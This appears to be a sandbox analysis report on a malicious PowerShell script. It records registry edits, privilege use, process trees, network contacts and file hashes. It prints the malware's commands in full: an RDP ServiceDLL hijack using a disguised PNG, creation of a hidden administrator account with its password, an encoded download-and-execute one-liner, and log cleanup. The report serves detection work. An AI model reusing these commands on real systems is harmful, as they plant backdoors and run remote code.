Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3236 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3236 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3728 wrote to memory of 2936 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3728 wrote to memory of 2936 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3236 wrote to memory of 1248 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3236 wrote to memory of 1248 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3236 wrote to memory of 4016 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3236 wrote to memory of 4016 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3236 wrote to memory of 3796 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3236 wrote to memory of 3796 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3236 wrote to memory of 2316 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3236 wrote to memory of 2316 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3236 wrote to memory of 2928 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3236 wrote to memory of 2928 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3236 wrote to memory of 3712 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3236 wrote to memory of 3712 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3236 wrote to memory of 3212 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 3236 wrote to memory of 3212 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 3212 wrote to memory of 2288 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3212 wrote to memory of 2288 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3236 wrote to memory of 1172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3236 wrote to memory of 1172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1172 wrote to memory of 3932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1172 wrote to memory of 3932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3932 wrote to memory of 3848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3932 wrote to memory of 3848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3848 wrote to memory of 3524 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3848 wrote to memory of 3524 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3236 wrote to memory of 2316 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3236 wrote to memory of 2316 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2316 wrote to memory of 3952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2316 wrote to memory of 3952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 1472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3952 wrote to memory of 1472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1472 wrote to memory of 2144 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1472 wrote to memory of 2144 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3260 wrote to memory of 1240 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3260 wrote to memory of 1240 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1240 wrote to memory of 1236 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1240 wrote to memory of 1236 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1584 wrote to memory of 196 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1584 wrote to memory of 196 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 196 wrote to memory of 3732 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 196 wrote to memory of 3732 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2808 wrote to memory of 636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2808 wrote to memory of 636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 636 wrote to memory of 1612 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 636 wrote to memory of 1612 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 184 wrote to memory of 2712 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 184 wrote to memory of 2712 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2712 wrote to memory of 2064 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2712 wrote to memory of 2064 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2132 wrote to memory of 3152 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2132 wrote to memory of 3152 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3152 wrote to memory of 1584 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3152 wrote to memory of 1584 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2932 wrote to memory of 1940 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2932 wrote to memory of 1940 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1940 wrote to memory of 3848 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1940 wrote to memory of 3848 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1240 wrote to memory of 2968 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1240 wrote to memory of 2968 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2164 wrote to memory of 3932 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2164 wrote to memory of 3932 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfa~.ps1

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\owrprf52\owrprf52.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2E3A.tmp" "c:\Users\Admin\AppData\Local\Temp\owrprf52\CSCC09036E78B6840F593AE87398C96D5AC.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc JlKWUXry /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc JlKWUXry /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc JlKWUXry /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc JlKWUXry

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc JlKWUXry

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc JlKWUXry

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 8.8.8.8:53 www.speedtest.net udp
N/A 151.101.2.219:80 www.speedtest.net tcp
N/A 151.101.2.219:443 www.speedtest.net tcp
N/A 151.101.2.219:80 www.speedtest.net tcp
N/A 8.8.8.8:53 c.speedtest.net udp
N/A 151.101.2.219:443 c.speedtest.net tcp
N/A 8.8.8.8:53 speedtest.zeelandnet.nl udp
N/A 212.115.192.180:8080 speedtest.zeelandnet.nl tcp
N/A 8.8.8.8:53 speedtest.worldstream.nl udp
N/A 185.182.195.78:8080 speedtest.worldstream.nl tcp
N/A 8.8.8.8:53 speedtest.caiw.net udp
N/A 62.45.44.26:8080 speedtest.caiw.net tcp
N/A 8.8.8.8:53 speedtest.hostsailor.com udp
N/A 185.117.72.144:8080 speedtest.hostsailor.com tcp
N/A 8.8.8.8:53 jfuag3.cn udp

Files

memory/3236-118-0x0000013935230000-0x0000013935231000-memory.dmp

memory/3236-122-0x0000013935D20000-0x0000013935D21000-memory.dmp

memory/3236-123-0x000001391B4A0000-0x000001391B4A2000-memory.dmp

memory/3236-124-0x000001391B4A3000-0x000001391B4A5000-memory.dmp

memory/3728-130-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\owrprf52\owrprf52.cmdline

MD5 bb7e477af2363beacb237f0c8dd20f54
SHA1 d56c4020d512b8499686340914ae6e472784b943
SHA256 cc555ab6172f4d6d62d42ba96d0854443289625da6f790bd1e2002a4226c13a7
SHA512 0779fee27eaa4c60a76b6c156b268c276b56eaae5ee076d100716c58936d2583e184a3f8abaf01014915b681879a608060b4d866ae4164c4cb03cf2bf72d3d5f

\??\c:\Users\Admin\AppData\Local\Temp\owrprf52\owrprf52.0.cs

MD5 fe552aa471e3747e57ddeff23d6da1fc
SHA1 16832293206ec339d47940533443f4fb375826fa
SHA256 60122a8ad7d370fa8dd0ca1b65f1b7685128c526195ac2ffb4edab103d45208d
SHA512 8cc715d2ad259d557b818e86b9fab2f91186ca4b1cde477218c0943313ec587d87499288598a2c64969fe2ee6eaf2132c269869f6a7201cf82100620d3ce34e6

memory/2936-133-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\owrprf52\CSCC09036E78B6840F593AE87398C96D5AC.TMP

MD5 8ea41b95990d5d7052e34d197a2c0eb7
SHA1 8fb06db36707d3ca35ddb67b8f7de70249e90d69
SHA256 b4f53c51611089edbf9f7a776e3569f4fd0d7e541b99df87ea13c015d4aaf1e1
SHA512 df2d0e4222b4b94d8ee665edf8b2f91be39da178a4b25815979851c54110acb79e662b778f1eaff67cc1e738a654b2a5d810ccb5888b850f781e9f06d6d9e0ea

C:\Users\Admin\AppData\Local\Temp\RES2E3A.tmp

MD5 9dbe0e09de872822a2eb3006fdd844a0
SHA1 cc55a8021023b763d7886a144cae9d84dc6cee24
SHA256 85b4968aa7f7cb82e7d1276a834bc03ab8a2f3b9da34e357bc34e9528d9cde3d
SHA512 25c395c9f14ac2a2b8629248d2b186b48c3def127cebf898f346e3299fbc7c6850478c2ef130b75aa497200f152702ef1f0c43a987ae6e006a2835e258ec9c8c

C:\Users\Admin\AppData\Local\Temp\owrprf52\owrprf52.dll

MD5 f561ff6645c3c086f8c4c52cb4ca4bd8
SHA1 18a26cb4b0b46f8ad029bcbc4ab3af2cc1e9d365
SHA256 68f0509a34426432e4a043a03fcbcccd0621026004c05a51bcb8b5f94d592c58
SHA512 206706f84c4ea6a3da4dbbe928c07db6101c6ef47213e4635bb68c01bd542748f0eef5d8e45180b521a125be09f345eac94202d4ccc924ec0d6778375b84fa52

memory/3236-137-0x0000013935220000-0x0000013935221000-memory.dmp

memory/3236-138-0x000001391B4A6000-0x000001391B4A8000-memory.dmp

memory/3236-143-0x00000139362C0000-0x00000139362C1000-memory.dmp

memory/3236-144-0x0000013936650000-0x0000013936651000-memory.dmp

memory/1248-151-0x0000000000000000-mapping.dmp

memory/1248-159-0x000001782F5A0000-0x000001782F5A2000-memory.dmp

memory/1248-160-0x000001782F5A3000-0x000001782F5A5000-memory.dmp

memory/1248-187-0x000001782F5A6000-0x000001782F5A8000-memory.dmp

memory/1248-188-0x000001782F5A8000-0x000001782F5AA000-memory.dmp

memory/4016-195-0x0000000000000000-mapping.dmp

memory/4016-206-0x0000013CDF7A3000-0x0000013CDF7A5000-memory.dmp

memory/4016-205-0x0000013CDF7A0000-0x0000013CDF7A2000-memory.dmp

memory/3796-237-0x0000000000000000-mapping.dmp

memory/3796-248-0x000002035AFC0000-0x000002035AFC2000-memory.dmp

memory/4016-247-0x0000013CDF7A6000-0x0000013CDF7A8000-memory.dmp

memory/3796-249-0x000002035AFC3000-0x000002035AFC5000-memory.dmp

memory/3796-281-0x000002035AFC8000-0x000002035AFCA000-memory.dmp

memory/3796-280-0x000002035AFC6000-0x000002035AFC8000-memory.dmp

memory/3236-286-0x000001391B4A8000-0x000001391B4A9000-memory.dmp

memory/2316-289-0x0000000000000000-mapping.dmp

memory/2928-290-0x0000000000000000-mapping.dmp

memory/3712-291-0x0000000000000000-mapping.dmp

memory/3212-330-0x0000000000000000-mapping.dmp

memory/2288-331-0x0000000000000000-mapping.dmp

memory/1172-334-0x0000000000000000-mapping.dmp

memory/3932-335-0x0000000000000000-mapping.dmp

memory/3848-336-0x0000000000000000-mapping.dmp

memory/3524-337-0x0000000000000000-mapping.dmp

memory/2316-338-0x0000000000000000-mapping.dmp

memory/3952-339-0x0000000000000000-mapping.dmp

memory/1472-340-0x0000000000000000-mapping.dmp

memory/2144-341-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 c13860727871a39063e0bb58117919ba
SHA1 4f91c6240d459858b7723e843d2ed37e1e9d152b
SHA256 8fa363bec94402d57a8c1acb288e9d9ca0a28eee18d300359e83252c60e01719
SHA512 348c5ecd6f06a114c11b100a95b89687a3064afe1fd5c3874772938a463c29d23938a1bca967734c19fd06bcf97f5d75c78431305912e06f1d73ceb83db48ec6

\Windows\Branding\mediasvc.png

MD5 aa6bf98c9120b0539c0270a3e453ddf6
SHA1 982bae56ad251639d34412d40bd7c0f2c2f4ff7a
SHA256 7ca008588561777420954419f28471ffc53dded26af0c640991ecf80de490d99
SHA512 d633dfa60bd26d516e4b659f66ca32deabf11ae5334ab3d187dd71d8137d56f92273af0a6abdc56b6af270d4821ab86ca5dacecb849e6151ffa929328ad0c74c

memory/1240-344-0x0000000000000000-mapping.dmp

memory/1236-345-0x0000000000000000-mapping.dmp

memory/196-346-0x0000000000000000-mapping.dmp

